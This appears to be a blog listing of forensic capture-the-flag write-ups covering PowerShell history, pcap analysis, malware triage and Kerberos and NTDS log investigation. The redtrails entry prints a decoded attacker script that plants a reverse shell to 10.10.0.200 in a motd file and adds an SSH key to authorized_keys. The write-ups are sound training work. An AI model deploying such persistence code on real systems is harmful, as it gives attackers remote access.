Mike.Horn

nuts

Fri, 18 Oct 2024 00:00:00 +0200

Q1: What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command)

Review the PowerShell history file:

ConsoleHost_history.txt

Look for commands related to NuGet package installation.

Identify the full command used to install the package.

Q2: Identify the URL from which the package was downloaded ?

Examine the web browsing history on the system.

Locate the URL used to download the NuGet package.

redtrails

Thu, 10 Oct 2024 00:00:00 +0200

Introduction

The flag is split into three parts. In this investigation, we were able to recover two parts. We start from a provided .pcap file.

1st part

The capture contains two HTTP frames. The second frame is large and contains interesting data.

Load the payload in CyberChef.
Apply reverse and Base64 decode operations.

After decoding, deobfuscate the bash script manually.

#!/bin/bash

lhJVXukWibAFfkv() {
    echo 'bash -c "bash -i >& /dev/tcp/10.10.0.200/1337 0>&1"' > /etc/update-motd.d/00-header
}

x7KG0bvubT6dID2() {
    echo -e "\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8Vkq9UTKMakAx2Zq+PnZNc6nYuEK3ZVXxH15bbUeB+elCb3JbVJyBfvAuZ0sonfAqZsyq9Jg6/KGtNsEmtVKXroPXhzFumTgg7Z1NvrUNvnqLIcfxTnP1+/4X284hp0bF2VbITb6oQKgzRdOs8GtOasKaK0k//2E5o0RKIEdrx0aL5HBOGPx0p8GrGe4kRKoAokGXwDVT22LlBylRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IfLMD/FQNy1B4DYhsY62O7o2xR0vxkBEp5UhBAX8gOTG0wjzrUHxmdUimXgiy39YVZaTJQwLBtzJS//YhkewyF/+CP0H7wIKIErlf5WFK5skLYO6uKVpx6akGXY8GADnPU3iPK/MtBC+RqWssdkGqFIA5xG2Fn+Klid9Obm1uXexJfYVjJMOfvuqtb6KcgLmi5uRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IlSxaiOAD2iNJboNuUIxMH/9HNYKd6mlwUpovqFcGBqXizcF21bxNGoOE31Vfox2fq2qW30BDWtHrrYi76iLh02FerHEYHdQAAA08NfUHyCw0fVl/qt6bAgKSb02k691lcDAo5JpEEzNQpub0X8xJItrbw==HTB{r3d15_1n574nc35" >> ~/.ssh/authorized_keys
	}

hL8FbEfp9L1261G() {
	lhJVXukWibAFfkv
	x7KG0bvubT6dID2
}

hL8FbEfp9L1261G

The script reveals the first flag embedded in an ssh-rsa key.

obscure

Sun, 29 Sep 2024 00:00:00 +0200

Introduction

We are provided with two files:

A PCAP file
A PHP file

PCAP Analysis

Start by analyzing the PCAP before fully deobfuscating support.php.

Filter for HTTP POST requests:

Only 4 POST requests are present.

Follow the HTTP streams to inspect the payloads. You will observe obfuscated strings such as:

0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5

These strings will be used as input for the PHP deobfuscation.

PHP Analysis

The provided PHP script performs multiple layers of obfuscation:

red stealer

Sun, 29 Sep 2024 00:00:00 +0200

Introduction

Tools recommended by the author (important for this analysis):

Whois
VirusTotal
MalwareBazaar
ThreatFox

Q1: Categorizing malware allows for a quicker and easier understanding of the malware, aiding in understanding its distinct behaviors and attack vectors. What’s the identified malware’s category?

Submit the file hash to VirusTotal and review the main summary page.

Identify the malware category based on detection labels and classification.

Q2: Clear identification of the malware file name facilitates better communication among the SOC team. What’s the file name associated with this malware?

On the VirusTotal main/detection page, locate the file details.

reveal

Sat, 28 Sep 2024 00:00:00 +0200

Q1: What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command)

Review the PowerShell history file:

ConsoleHost_history.txt

Look for commands related to NuGet package installation.

Identify the full command used to install the package.

Q2: Identify the URL from which the package was downloaded ?

Examine the web browsing history on the system.

Locate the URL used to download the NuGet package.

heartbreaker-continuum

Mon, 23 Sep 2024 00:00:00 +0200

Q1: To accurately reference and identify the suspicious binary, please provide its SHA256 hash.

Identify the SHA256 hash of the suspicious binary file.

File Name: Superstar_MemberCard.tiff.exe SHA256: 12daa34111bb54b3dcbad42305663e44e7e6c3842f015cccbbe6564d9dfd3ea3

Q2: When was the binary file originally created, according to its metadata (UTC)?

Upload the file hash to VirusTotal to retrieve metadata information.

Locate the first seen / creation timestamp and convert it to UTC.

Q3: Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?

Use a tool such as readpe to inspect the binary structure.

campfire-1

Sun, 22 Sep 2024 00:00:00 +0200

Q1: Analyzing Domain Controller Security Logs

Can you confirm the date and time when the Kerberoasting activity occurred?

Open Event Viewer on the Windows VM and search for Event ID 4769.

🕒 Remember to convert your local time to UTC.

Q2: Targeted Service Name

What is the Service Name that was targeted?

Check the “Service Information” section of the same event:

Q3: Workstation Identification

Identify the Workstation IP Address from which the activity originated.

campfire-2

Sun, 22 Sep 2024 00:00:00 +0200

Q1: When did the AS-REP Roasting attack occur, and when did the attacker request the Kerberos ticket for the vulnerable user?

Open Event Viewer on the Windows VM and search for Event ID 4768.

Look for anomalies in the logs — specifically events where:

Pre-Authentication Type: 0

This indicates that the account does not require Kerberos pre-authentication, making it vulnerable to AS-REP Roasting.

🕒 Remember to convert the timestamp to UTC when documenting your findings.

crownjewel-1

Sun, 22 Sep 2024 00:00:00 +0200

Q1: Attackers can abuse the vssadmin utility to create volume shadow snapshots and then extract sensitive files like NTDS.dit to bypass security mechanisms. Identify the time when the Volume Shadow Copy service entered a running state.

Open the SYSTEM.evtx log and search for Event ID 7036.

Look for events indicating the Volume Shadow Copy service entering a running state:

🕒 Convert the timestamp to UTC.

Q2: When a volume shadow snapshot is created, the Volume shadow copy service validates the privileges using the Machine account and enumerates User groups. Find the User groups it enumerates, the Subject Account name, and also identify the Process ID(in decimal) of the Volume shadow copy service process

Search for Event ID 4799 and filter for:

crownjewel-2

Sun, 22 Sep 2024 00:00:00 +0200

Q1: When utilizing ntdsutil.exe to dump NTDS on disk, it simultaneously employs the Microsoft Shadow Copy Service. What is the most recent timestamp at which this service entered the running state, signifying the possible initiation of the NTDS dumping process?

Open the SYSTEM.evtx log and search for Event ID 7036.

Use a search (Ctrl+F) for Volume Shadow Copy service events.

Identify the most recent entry where the service entered the running state and note the timestamp from the:

reaper

Sat, 21 Sep 2024 00:00:00 +0200

Q1: IP Address of Forela-Wkstn001

What is the IP address of Forela-Wkstn001?

🔎 See Q2 for the analysis steps.

Q2: IP Address of Forela-Wkstn002

What is the IP address of Forela-Wkstn002?

Note: NetworkMiner requires .pcap format. Convert the file if needed:

tshark -F pcap -r ntlmrelay.pcapng -w ntlmrelay.pcap

Open the capture in NetworkMiner to get an overview of network activity. Both workstation IP addresses can be identified here: